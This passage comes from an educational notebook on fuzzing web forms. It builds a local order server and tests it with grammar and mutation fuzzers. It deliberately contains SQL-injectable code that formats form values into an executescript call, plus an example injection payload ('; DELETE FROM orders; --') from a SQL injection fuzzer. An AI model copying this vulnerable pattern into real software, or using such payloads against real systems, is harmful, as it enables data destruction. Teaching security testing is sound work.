`WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.\n\nInternally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features.\n\n### SQL Injection Attacks\n\n`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:\n\n```python\n>>> sql_fuzzer = SQLInjectionFuzzer(httpd_url, \"DELETE FROM orders\")\n>>> sql_fuzzer.fuzz()\n\"/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit=\"\n```\nAs you can see, the path to be retrieved contains the payload encoded into one of the form field values.\n\nInternally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features.\n\n`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.\n\n![](PICS/WebFuzzer-synopsis-1.svg)\n\n", "_____no_output_____" ], [ "## A Web User Interface\n\nLet us start with a simple example. We want to set up a _Web server_ that allows readers of this book to buy fuzzingbook-branded fan articles (\"swag\"). 
In reality, we would make use of an existing Web shop (or an appropriate framework) for this purpose. For the purpose of this book, we _write our own Web server_, building on the HTTP server facilities provided by the Python library.", "_____no_output_____" ], [ "### Excursion: Implementing a Web Server", "_____no_output_____" ], [ "All of our Web server is defined in a `HTTPRequestHandler`, which, as the name suggests, handles arbitrary Web page requests.", "_____no_output_____" ] ], [ [ "from http.server import HTTPServer, BaseHTTPRequestHandler\nfrom http.server import HTTPStatus # type: ignore", "_____no_output_____" ], [ "class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n \"\"\"A simple HTTP server\"\"\"\n pass", "_____no_output_____" ] ], [ [ "#### Taking Orders\n\nFor our Web server, we need a number of Web pages:\n* We want one page where customers can place an order.\n* We want one page where they see their order confirmed. \n* Additionally, we need pages display error messages such as \"Page Not Found\".", "_____no_output_____" ], [ "We start with the order form. The dictionary `FUZZINGBOOK_SWAG` holds the items that customers can order, together with long descriptions:", "_____no_output_____" ] ], [ [ "import bookutils", "_____no_output_____" ], [ "from typing import NoReturn, Tuple, Dict, List, Optional, Union", "_____no_output_____" ], [ "FUZZINGBOOK_SWAG = {\n \"tshirt\": \"One FuzzingBook T-Shirt\",\n \"drill\": \"One FuzzingBook Rotary Hammer\",\n \"lockset\": \"One FuzzingBook Lock Set\"\n}", "_____no_output_____" ] ], [ [ "This is the HTML code for the order form. The menu for selecting the swag to be ordered is created dynamically from `FUZZINGBOOK_SWAG`. We omit plenty of details such as precise shipping address, payment, shopping cart, and more.", "_____no_output_____" ] ], [ [ "HTML_ORDER_FORM = \"\"\"\n<html><body>\n<form action=\"/order\" style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n <strong id=\"title\" style=\"font-size: x-large\">Fuzzingbook Swag Order Form</strong>\n <p>\n Yes! Please send me at your earliest convenience\n <select name=\"item\">\n \"\"\"\n# (We don't use h2, h3, etc. 
here\n# as they interfere with the notebook table of contents)\n\n\nfor item in FUZZINGBOOK_SWAG:\n HTML_ORDER_FORM += \\\n '<option value=\"{item}\">{name}</option>\\n'.format(item=item,\n name=FUZZINGBOOK_SWAG[item])\n\nHTML_ORDER_FORM += \"\"\"\n </select>\n <br>\n <table>\n <tr><td>\n <label for=\"name\">Name: </label><input type=\"text\" name=\"name\">\n </td><td>\n <label for=\"email\">Email: </label><input type=\"email\" name=\"email\"><br>\n </td></tr>\n <tr><td>\n <label for=\"city\">City: </label><input type=\"text\" name=\"city\">\n </td><td>\n <label for=\"zip\">ZIP Code: </label><input type=\"number\" name=\"zip\">\n </tr></tr>\n </table>\n <input type=\"checkbox\" name=\"terms\"><label for=\"terms\">I have read\n the <a href=\"/terms\">terms and conditions</a></label>.<br>\n <input type=\"submit\" name=\"submit\" value=\"Place order\">\n</p>\n</form>\n</body></html>\n\"\"\"", "_____no_output_____" ] ], [ [ "This is what the order form looks like:", "_____no_output_____" ] ], [ [ "from IPython.display import display", "_____no_output_____" ], [ "from bookutils import HTML", "_____no_output_____" ], [ "HTML(HTML_ORDER_FORM)", "_____no_output_____" ] ], [ [ "This form is not yet functional, as there is no server behind it; pressing \"place order\" will lead you to a nonexistent page.", "_____no_output_____" ], [ "#### Order Confirmation\n\nOnce we have gotten an order, we show a confirmation page, which is instantiated with the customer information submitted before. Here is the HTML and the rendering:", "_____no_output_____" ] ], [ [ "HTML_ORDER_RECEIVED = \"\"\"\n<html><body>\n<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n <p id=\"confirmation\">\n We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br>\n A confirmation mail will be sent to {email}.\n </p>\n <p>\n Want more swag? Use our <a href=\"/\">order form</a>!\n </p>\n</div>\n</body></html>\n\"\"\"", "_____no_output_____" ], [ "HTML(HTML_ORDER_RECEIVED.format(item_name=\"One FuzzingBook Rotary Hammer\",\n name=\"Jane Doe\",\n email=\"[email protected]\",\n city=\"Seattle\",\n zip=\"98104\"))", "_____no_output_____" ] ], [ [ "#### Terms and Conditions\n\nA Web site can only be complete if it has the necessary legalese. This page shows some terms and conditions.", "_____no_output_____" ] ], [ [ "HTML_TERMS_AND_CONDITIONS = \"\"\"\n<html><body>\n<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n <strong id=\"title\" style=\"font-size: x-large\">Fuzzingbook Terms and Conditions</strong>\n <p>\n The content of this project is licensed under the\n <a href=\"https://creativecommons.org/licenses/by-nc-sa/4.0/\">Creative Commons\n Attribution-NonCommercial-ShareAlike 4.0 International License.</a>\n </p>\n <p>\n To place an order, use our <a href=\"/\">order form</a>.\n </p>\n</div>\n</body></html>\n\"\"\"", "_____no_output_____" ], [ "HTML(HTML_TERMS_AND_CONDITIONS)", "_____no_output_____" ] ], [ [ "#### Storing Orders", "_____no_output_____" ], [ "To store orders, we make use of a *database*, stored in the file `orders.db`.", "_____no_output_____" ] ], [ [ "import sqlite3\nimport os", "_____no_output_____" ], [ "ORDERS_DB = \"orders.db\"", "_____no_output_____" ] ], [ [ "To interact with the database, we use *SQL commands*. 
The following commands create a table with five text columns for item, name, email, city, and zip – the exact same fields we also use in our HTML form.", "_____no_output_____" ] ], [ [ "def init_db():\n if os.path.exists(ORDERS_DB):\n os.remove(ORDERS_DB)\n\n db_connection = sqlite3.connect(ORDERS_DB)\n db_connection.execute(\"DROP TABLE IF EXISTS orders\")\n db_connection.execute(\"CREATE TABLE orders \"\n \"(item text, name text, email text, \"\n \"city text, zip text)\")\n db_connection.commit()\n\n return db_connection", "_____no_output_____" ], [ "db = init_db()", "_____no_output_____" ] ], [ [ "At this point, the database is still empty:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[]\n" ] ], [ [ "We can add entries using the SQL `INSERT` command:", "_____no_output_____" ] ], [ [ "db.execute(\"INSERT INTO orders \" +\n \"VALUES ('lockset', 'Walter White', \"\n \"'[email protected]', 'Albuquerque', '87101')\")\ndb.commit()", "_____no_output_____" ] ], [ [ "These values are now in the database:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[('lockset', 'Walter White', '[email protected]', 'Albuquerque', '87101')]\n" ] ], [ [ "We can also delete entries from the table again (say, after completion of the order):", "_____no_output_____" ] ], [ [ "db.execute(\"DELETE FROM orders WHERE name = 'Walter White'\")\ndb.commit()", "_____no_output_____" ], [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[]\n" ] ], [ [ "#### Handling HTTP Requests\n\nWe have an order form and a database; now we need a Web server which brings it all together. The Python `http.server` module provides everything we need to build a simple HTTP server. A `HTTPRequestHandler` is an object that takes and processes HTTP requests – in particular, `GET` requests for retrieving Web pages.", "_____no_output_____" ], [ "We implement the `do_GET()` method that, based on the given path, branches off to serve the requested Web pages. Requesting the path `/` produces the order form; a path beginning with `/order` sends an order to be processed. All other requests end in a `Page Not Found` message.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def do_GET(self):\n try:\n # print(\"GET \" + self.path)\n if self.path == \"/\":\n self.send_order_form()\n elif self.path.startswith(\"/order\"):\n self.handle_order()\n elif self.path.startswith(\"/terms\"):\n self.send_terms_and_conditions()\n else:\n self.not_found()\n except Exception:\n self.internal_server_error()", "_____no_output_____" ] ], [ [ "##### Order Form\n\nAccessing the home page (i.e. 
getting the page at `/`) is simple: We go and serve the `html_order_form` as defined above.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def send_order_form(self):\n self.send_response(HTTPStatus.OK, \"Place your order\")\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(HTML_ORDER_FORM.encode(\"utf8\"))", "_____no_output_____" ] ], [ [ "Likewise, we can send out the terms and conditions:", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def send_terms_and_conditions(self):\n self.send_response(HTTPStatus.OK, \"Terms and Conditions\")\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(HTML_TERMS_AND_CONDITIONS.encode(\"utf8\"))", "_____no_output_____" ] ], [ [ "##### Processing Orders", "_____no_output_____" ], [ "When the user clicks `Submit` on the order form, the Web browser creates and retrieves a URL of the form\n\n```\n<hostname>/order?field_1=value_1&field_2=value_2&field_3=value_3\n```\n\nwhere each `field_i` is the name of the field in the HTML form, and `value_i` is the value provided by the user. Values use the CGI encoding we have seen in the [chapter on coverage](Coverage.ipynb) – that is, spaces are converted into `+`, and characters that are not digits or letters are converted into `%nn`, where `nn` is the hexadecimal value of the character.\n\nIf Jane Doe <[email protected]> from Seattle orders a T-Shirt, this is the URL the browser creates:\n\n```\n<hostname>/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\n```", "_____no_output_____" ], [ "When processing a query, the attribute `self.path` of the HTTP request handler holds the path accessed – i.e., everything after `<hostname>`. The helper method `get_field_values()` takes `self.path` and returns a dictionary of values.", "_____no_output_____" ] ], [ [ "import urllib.parse", "_____no_output_____" ], [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def get_field_values(self):\n # Note: this fails to decode non-ASCII characters properly\n query_string = urllib.parse.urlparse(self.path).query\n\n # fields is { 'item': ['tshirt'], 'name': ['Jane Doe'], ...}\n fields = urllib.parse.parse_qs(query_string, keep_blank_values=True)\n\n values = {}\n for key in fields:\n values[key] = fields[key][0]\n\n return values", "_____no_output_____" ] ], [ [ "The method `handle_order()` takes these values from the URL, stores the order, and returns a page confirming the order. 
If anything goes wrong, it sends an internal server error.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def handle_order(self):\n values = self.get_field_values()\n self.store_order(values)\n self.send_order_received(values)", "_____no_output_____" ] ], [ [ "Storing the order makes use of the database connection defined above; we create an SQL command instantiated with the values as extracted from the URL.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def store_order(self, values):\n db = sqlite3.connect(ORDERS_DB)\n # The following should be one line\n sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n self.log_message(\"%s\", sql_command)\n db.executescript(sql_command)\n db.commit()", "_____no_output_____" ] ], [ [ "After storing the order, we send the confirmation HTML page, which again is instantiated with the values from the URL.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def send_order_received(self, values):\n # Should use html.escape()\n values[\"item_name\"] = FUZZINGBOOK_SWAG[values[\"item\"]]\n confirmation = HTML_ORDER_RECEIVED.format(**values).encode(\"utf8\")\n\n self.send_response(HTTPStatus.OK, \"Order received\")\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(confirmation)", "_____no_output_____" ] ], [ [ "##### Other HTTP commands\n\nBesides the `GET` command (which does all the heavy lifting), HTTP servers can also support other HTTP commands; we support the `HEAD` command, which returns the head information of a Web page. In our case, this is always empty.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def do_HEAD(self):\n # print(\"HEAD \" + self.path)\n self.send_response(HTTPStatus.OK)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()", "_____no_output_____" ] ], [ [ "#### Error Handling\n\nWe have defined pages for submitting and processing orders; now we also need a few pages for errors that might occur.", "_____no_output_____" ], [ "##### Page Not Found\n\nThis page is displayed if a non-existing page (i.e. anything except `/` or `/order`) is requested.", "_____no_output_____" ] ], [ [ "HTML_NOT_FOUND = \"\"\"\n<html><body>\n<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n <strong id=\"title\" style=\"font-size: x-large\">Sorry.</strong>\n <p>\n This page does not exist. Try our <a href=\"/\">order form</a> instead.\n </p>\n</div>\n</body></html>\n \"\"\"", "_____no_output_____" ], [ "HTML(HTML_NOT_FOUND)", "_____no_output_____" ] ], [ [ "The method `not_found()` takes care of sending this out with the appropriate HTTP status code.", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def not_found(self):\n self.send_response(HTTPStatus.NOT_FOUND, \"Not found\")\n\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n message = HTML_NOT_FOUND\n self.wfile.write(message.encode(\"utf8\"))", "_____no_output_____" ] ], [ [ "##### Internal Errors\n\nThis page is shown for any internal errors that might occur. 
For diagnostic purposes, we have it include the traceback of the failing function.", "_____no_output_____" ] ], [ [ "HTML_INTERNAL_SERVER_ERROR = \"\"\"\n<html><body>\n<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n <strong id=\"title\" style=\"font-size: x-large\">Internal Server Error</strong>\n <p>\n The server has encountered an internal error. Go to our <a href=\"/\">order form</a>.\n <pre>{error_message}</pre>\n </p>\n</div>\n</body></html>\n \"\"\"", "_____no_output_____" ], [ "HTML(HTML_INTERNAL_SERVER_ERROR)", "_____no_output_____" ], [ "import sys\nimport traceback", "_____no_output_____" ], [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def internal_server_error(self):\n self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, \"Internal Error\")\n\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n exc = traceback.format_exc()\n self.log_message(\"%s\", exc.strip())\n\n message = HTML_INTERNAL_SERVER_ERROR.format(error_message=exc)\n self.wfile.write(message.encode(\"utf8\"))", "_____no_output_____" ] ], [ [ "#### Logging\n\nOur server runs as a separate process in the background, waiting to receive commands at all time. To see what it is doing, we implement a special logging mechanism. The `httpd_message_queue` establishes a queue into which one process (the server) can store Python objects, and in which another process (the notebook) can retrieve them. We use this to pass log messages from the server, which we can then display in the notebook.", "_____no_output_____" ], [ "For multiprocessing, we use the `multiprocess` module - a variant of the standard Python `multiprocessing` module that also works in notebooks. If you are running this code outside of a notebook, you can also use `multiprocessing` instead.", "_____no_output_____" ] ], [ [ "from multiprocess import Queue # type: ignore", "_____no_output_____" ], [ "HTTPD_MESSAGE_QUEUE = Queue()", "_____no_output_____" ] ], [ [ "Let us place two messages in the queue:", "_____no_output_____" ] ], [ [ "HTTPD_MESSAGE_QUEUE.put(\"I am another message\")", "_____no_output_____" ], [ "HTTPD_MESSAGE_QUEUE.put(\"I am one more message\")", "_____no_output_____" ] ], [ [ "To distinguish server messages from other parts of the notebook, we format them specially:", "_____no_output_____" ] ], [ [ "from bookutils import rich_output, terminal_escape", "_____no_output_____" ], [ "def display_httpd_message(message: str) -> None:\n if rich_output():\n display(\n HTML(\n '<pre style=\"background: NavajoWhite;\">' +\n message +\n \"</pre>\"))\n else:\n print(terminal_escape(message))", "_____no_output_____" ], [ "display_httpd_message(\"I am a httpd server message\")", "_____no_output_____" ] ], [ [ "The method `print_httpd_messages()` prints all messages accumulated in the queue so far:", "_____no_output_____" ] ], [ [ "def print_httpd_messages():\n while not HTTPD_MESSAGE_QUEUE.empty():\n message = HTTPD_MESSAGE_QUEUE.get()\n display_httpd_message(message)", "_____no_output_____" ], [ "import time", "_____no_output_____" ], [ "time.sleep(1)\nprint_httpd_messages()", "_____no_output_____" ] ], [ [ "With `clear_httpd_messages()`, we can silently discard all pending messages:", "_____no_output_____" ] ], [ [ "def clear_httpd_messages() -> None:\n while not HTTPD_MESSAGE_QUEUE.empty():\n HTTPD_MESSAGE_QUEUE.get()", "_____no_output_____" ] ], [ [ "The method `log_message()` in the request handler makes use of the queue to store its messages:", "_____no_output_____" ] ], [ [ 
"class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def log_message(self, format: str, *args) -> None:\n message = (\"%s - - [%s] %s\\n\" %\n (self.address_string(),\n self.log_date_time_string(),\n format % args))\n HTTPD_MESSAGE_QUEUE.put(message)", "_____no_output_____" ] ], [ [ "In [the chapter on carving](Carver.ipynb), we had introduced a `webbrowser()` method which retrieves the contents of the given URL. We now extend it such that it also prints out any log messages produced by the server:", "_____no_output_____" ] ], [ [ "import requests", "_____no_output_____" ], [ "def webbrowser(url: str, mute: bool = False) -> str:\n \"\"\"Download and return the http/https resource given by the URL\"\"\"\n\n try:\n r = requests.get(url)\n contents = r.text\n finally:\n if not mute:\n print_httpd_messages()\n else:\n clear_httpd_messages()\n\n return contents", "_____no_output_____" ] ], [ [ "With `webbrowser()`, we are now ready to get the Web server up and running. ", "_____no_output_____" ], [ "### End of Excursion", "_____no_output_____" ], [ "### Running the Server\n\nWe run the server on the *local host* – that is, the same machine which also runs this notebook. We check for an accessible port and put the resulting URL in the queue created earlier.", "_____no_output_____" ] ], [ [ "def run_httpd_forever(handler_class: type) -> NoReturn: # type: ignore\n host = \"127.0.0.1\" # localhost IP\n for port in range(8800, 9000):\n httpd_address = (host, port)\n\n try:\n httpd = HTTPServer(httpd_address, handler_class)\n break\n except OSError:\n continue\n\n httpd_url = \"http://\" + host + \":\" + repr(port)\n HTTPD_MESSAGE_QUEUE.put(httpd_url)\n httpd.serve_forever()", "_____no_output_____" ] ], [ [ "The function `start_httpd()` starts the server in a separate process, which we start using the `multiprocess` module. It retrieves its URL from the message queue and returns it, such that we can start talking to the server.", "_____no_output_____" ] ], [ [ "from multiprocess import Process", "_____no_output_____" ], [ "def start_httpd(handler_class: type = SimpleHTTPRequestHandler) \\\n -> Tuple[Process, str]:\n clear_httpd_messages()\n\n httpd_process = Process(target=run_httpd_forever, args=(handler_class,))\n httpd_process.start()\n\n httpd_url = HTTPD_MESSAGE_QUEUE.get()\n return httpd_process, httpd_url", "_____no_output_____" ] ], [ [ "Let us now start the server and save its URL:", "_____no_output_____" ] ], [ [ "httpd_process, httpd_url = start_httpd()\nhttpd_url", "_____no_output_____" ] ], [ [ "### Interacting with the Server\n\nLet us now access the server just created.", "_____no_output_____" ], [ "#### Direct Browser Access\n\nIf you are running the Jupyter notebook server on the local host as well, you can now access the server directly at the given URL. Simply open the address in `httpd_url` by clicking on the link below.\n\n**Note**: This only works if you are running the Jupyter notebook server on the local host.", "_____no_output_____" ] ], [ [ "def print_url(url: str) -> None:\n if rich_output():\n display(HTML('<pre><a href=\"%s\">%s</a></pre>' % (url, url)))\n else:\n print(terminal_escape(url))", "_____no_output_____" ], [ "print_url(httpd_url)", "_____no_output_____" ] ], [ [ "Even more convenient, you may be able to interact directly with the server using the window below. 
\n\n**Note**: This only works if you are running the Jupyter notebook server on the local host.", "_____no_output_____" ] ], [ [ "from IPython.display import IFrame", "_____no_output_____" ], [ "IFrame(httpd_url, '100%', 230)", "_____no_output_____" ] ], [ [ "After interaction, you can retrieve the messages produced by the server:", "_____no_output_____" ] ], [ [ "print_httpd_messages()", "_____no_output_____" ] ], [ [ "We can also see any orders placed in the `orders` database (`db`):", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[]\n" ] ], [ [ "And we can clear the order database:", "_____no_output_____" ] ], [ [ "db.execute(\"DELETE FROM orders\")\ndb.commit()", "_____no_output_____" ] ], [ [ "#### Retrieving the Home Page\n\nEven if our browser cannot directly interact with the server, the _notebook_ can. We can, for instance, retrieve the contents of the home page and display them:", "_____no_output_____" ] ], [ [ "contents = webbrowser(httpd_url)", "_____no_output_____" ], [ "HTML(contents)", "_____no_output_____" ] ], [ [ "#### Placing Orders\n\nTo test this form, we can generate URLs with orders and have the server process them.", "_____no_output_____" ], [ "The method `urljoin()` puts together a base URL (i.e., the URL of our server) and a path – say, the path towards our order.", "_____no_output_____" ] ], [ [ "from urllib.parse import urljoin, urlsplit", "_____no_output_____" ], [ "urljoin(httpd_url, \"/order?foo=bar\")", "_____no_output_____" ] ], [ [ "With `urljoin()`, we can create a full URL that is the same as the one generated by the browser as we submit the order form. Sending this URL to the browser effectively places the order, as we can see in the server log produced:", "_____no_output_____" ] ], [ [ "contents = webbrowser(urljoin(httpd_url,\n \"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\"))", "_____no_output_____" ] ], [ [ "The web page returned confirms the order:", "_____no_output_____" ] ], [ [ "HTML(contents)", "_____no_output_____" ] ], [ [ "And the order is in the database, too:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[('tshirt', 'Jane Doe', '[email protected]', 'Seattle', '98104')]\n" ] ], [ [ "#### Error Messages\n\nWe can also test whether the server correctly responds to invalid requests. Nonexistent pages, for instance, are correctly handled:", "_____no_output_____" ] ], [ [ "HTML(webbrowser(urljoin(httpd_url, \"/some/other/path\")))", "_____no_output_____" ] ], [ [ "You may remember we also have a page for internal server errors. Can we get the server to produce this page? To find this out, we have to test the server thoroughly – which we do in the remainder of this chapter.", "_____no_output_____" ], [ "## Fuzzing Input Forms\n\nAfter setting up and starting the server, let us now go and systematically test it – first with expected, and then with less expected values.", "_____no_output_____" ], [ "### Fuzzing with Expected Values\n\nSince placing orders is all done by creating appropriate URLs, we define a [grammar](Grammars.ipynb) `ORDER_GRAMMAR` which encodes ordering URLs. 
It comes with a few sample values for names, email addresses, cities and (random) digits.", "_____no_output_____" ], [ "#### Excursion: Implementing cgi_decode()", "_____no_output_____" ], [ "To make it easier to define strings that become part of a URL, we define the function `cgi_encode()`, taking a string and automatically encoding it into CGI:", "_____no_output_____" ] ], [ [ "import string", "_____no_output_____" ], [ "def cgi_encode(s: str, do_not_encode: str = \"\") -> str:\n ret = \"\"\n for c in s:\n if (c in string.ascii_letters or c in string.digits\n or c in \"$-_.+!*'(),\" or c in do_not_encode):\n ret += c\n elif c == ' ':\n ret += '+'\n else:\n ret += \"%%%02x\" % ord(c)\n return ret", "_____no_output_____" ], [ "s = cgi_encode('Is \"DOW30\" down .24%?')\ns", "_____no_output_____" ] ], [ [ "The optional parameter `do_not_encode` allows us to skip certain characters from encoding. This is useful when encoding grammar rules:", "_____no_output_____" ] ], [ [ "cgi_encode(\"<string>@<string>\", \"<>\")", "_____no_output_____" ] ], [ [ "`cgi_encode()` is the exact counterpart of the `cgi_decode()` function defined in the [chapter on coverage](Coverage.ipynb):", "_____no_output_____" ] ], [ [ "from Coverage import cgi_decode # minor dependency", "_____no_output_____" ], [ "cgi_decode(s)", "_____no_output_____" ] ], [ [ "#### End of Excursion", "_____no_output_____" ], [ "In the grammar, we make use of `cgi_encode()` to encode strings:", "_____no_output_____" ] ], [ [ "from Grammars import crange, is_valid_grammar, syntax_diagram, Grammar", "_____no_output_____" ], [ "ORDER_GRAMMAR: Grammar = {\n \"<start>\": [\"<order>\"],\n \"<order>\": [\"/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>\"],\n \"<item>\": [\"tshirt\", \"drill\", \"lockset\"],\n \"<name>\": [cgi_encode(\"Jane Doe\"), cgi_encode(\"John Smith\")],\n \"<email>\": [cgi_encode(\"[email protected]\"), cgi_encode(\"[email protected]\")],\n \"<city>\": [\"Seattle\", cgi_encode(\"New York\")],\n \"<zip>\": [\"<digit>\" * 5],\n \"<digit>\": crange('0', '9')\n}", "_____no_output_____" ], [ "assert is_valid_grammar(ORDER_GRAMMAR)", "_____no_output_____" ], [ "syntax_diagram(ORDER_GRAMMAR)", "start\n" ] ], [ [ "Using [one of our grammar fuzzers](GrammarFuzzer.ipynb), we can instantiate this grammar and generate URLs:", "_____no_output_____" ] ], [ [ "from GrammarFuzzer import GrammarFuzzer", "_____no_output_____" ], [ "order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)\n[order_fuzzer.fuzz() for i in range(5)]", "_____no_output_____" ] ], [ [ "Sending these URLs to the server will have them processed correctly:", "_____no_output_____" ] ], [ [ "HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))", "_____no_output_____" ], [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[('tshirt', 'Jane Doe', '[email protected]', 'Seattle', '98104'), ('lockset', 'Jane Doe', '[email protected]', 'Seattle', '16631')]\n" ] ], [ [ "### Fuzzing with Unexpected Values", "_____no_output_____" ], [ "We can now see that the server does a good job when faced with \"standard\" values. But what happens if we feed it non-standard values? To this end, we make use of a [mutation fuzzer](MutationFuzzer.ipynb) which inserts random changes into the URL. Our seed (i.e. 
the value to be mutated) comes from the grammar fuzzer:", "_____no_output_____" ] ], [ [ "seed = order_fuzzer.fuzz()\nseed", "_____no_output_____" ] ], [ [ "Mutating this string yields mutations not only in the field values, but also in field names as well as the URL structure.", "_____no_output_____" ] ], [ [ "from MutationFuzzer import MutationFuzzer # minor deoendency", "_____no_output_____" ], [ "mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)\n[mutate_order_fuzzer.fuzz() for i in range(5)]", "_____no_output_____" ] ], [ [ "Let us fuzz a little until we get an internal server error. We use the Python `requests` module to interact with the Web server such that we can directly access the HTTP status code.", "_____no_output_____" ] ], [ [ "while True:\n path = mutate_order_fuzzer.fuzz()\n url = urljoin(httpd_url, path)\n r = requests.get(url)\n if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:\n break", "_____no_output_____" ] ], [ [ "That didn't take long. Here's the offending URL:", "_____no_output_____" ] ], [ [ "url", "_____no_output_____" ], [ "clear_httpd_messages()\nHTML(webbrowser(url))", "_____no_output_____" ] ], [ [ "How does the URL cause this internal error? We make use of [delta debugging](Reducer.ipynb) to minimize the failure-inducing path, setting up a `WebRunner` class to define the failure condition:", "_____no_output_____" ] ], [ [ "failing_path = path\nfailing_path", "_____no_output_____" ], [ "from Fuzzer import Runner", "_____no_output_____" ], [ "class WebRunner(Runner):\n \"\"\"Runner for a Web server\"\"\"\n\n def __init__(self, base_url: str = None):\n self.base_url = base_url\n\n def run(self, url: str) -> Tuple[str, str]:\n if self.base_url is not None:\n url = urljoin(self.base_url, url)\n\n import requests # for imports\n r = requests.get(url)\n if r.status_code == HTTPStatus.OK:\n return url, Runner.PASS\n elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:\n return url, Runner.FAIL\n else:\n return url, Runner.UNRESOLVED", "_____no_output_____" ], [ "web_runner = WebRunner(httpd_url)\nweb_runner.run(failing_path)", "_____no_output_____" ] ], [ [ "This is the minimized path:", "_____no_output_____" ] ], [ [ "from Reducer import DeltaDebuggingReducer # minor", "_____no_output_____" ], [ "minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)\nminimized_path", "_____no_output_____" ] ], [ [ "It turns out that our server encounters an internal error if we do not supply the requested fields:", "_____no_output_____" ] ], [ [ "minimized_url = urljoin(httpd_url, minimized_path)\nminimized_url", "_____no_output_____" ], [ "clear_httpd_messages()\nHTML(webbrowser(minimized_url))", "_____no_output_____" ] ], [ [ "We see that we might have a lot to do to make our Web server more robust against unexpected inputs. The [exercises](#Exercises) give some instructions on what to do.", "_____no_output_____" ], [ "## Extracting Grammars for Input Forms\n\nIn our previous examples, we have assumed that we have a grammar that produces valid (or less valid) order queries. However, such a grammar does not need to be specified manually; we can also _extract it automatically_ from a Web page at hand. This way, we can apply our test generators on arbitrary Web forms without a manual specification step.", "_____no_output_____" ], [ "### Searching HTML for Input Fields\n\nThe key idea of our approach is to identify all input fields in a form. 
To this end, let us take a look at how the individual elements in our order form are encoded in HTML:", "_____no_output_____" ] ], [ [ "html_text = webbrowser(httpd_url)\nprint(html_text[html_text.find(\"<form\"):html_text.find(\"</form>\") + len(\"</form>\")])", "_____no_output_____" ] ], [ [ "We see that there is a number of form elements that accept inputs, in particular `<input>`, but also `<select>` and `<option>`. The idea now is to _parse_ the HTML of the Web page in question, to extract these individual input elements, and then to create a _grammar_ that produces a matching URL, effectively filling out the form.", "_____no_output_____" ], [ "To parse the HTML page, we could define a grammar to parse HTML and make use of [our own parser infrastructure](Parser.ipynb). However, it is much easier to not reinvent the wheel and instead build on the existing, dedicated `HTMLParser` class from the Python library.", "_____no_output_____" ] ], [ [ "from html.parser import HTMLParser", "_____no_output_____" ] ], [ [ "During parsing, we search for `<form>` tags and save the associated action (i.e., the URL to be invoked when the form is submitted) in the `action` attribute. While processing the form, we create a map `fields` that holds all input fields we have seen; it maps field names to the respective HTML input types (`\"text\"`, `\"number\"`, `\"checkbox\"`, etc.). Exclusive selection options map to a list of possible values; the `select` stack holds the currently active selection.", "_____no_output_____" ] ], [ [ "class FormHTMLParser(HTMLParser):\n \"\"\"A parser for HTML forms\"\"\"\n\n def reset(self) -> None:\n super().reset()\n\n # Form action attribute (a URL)\n self.action = \"\"\n\n # Map of field name to type\n # (or selection name to [option_1, option_2, 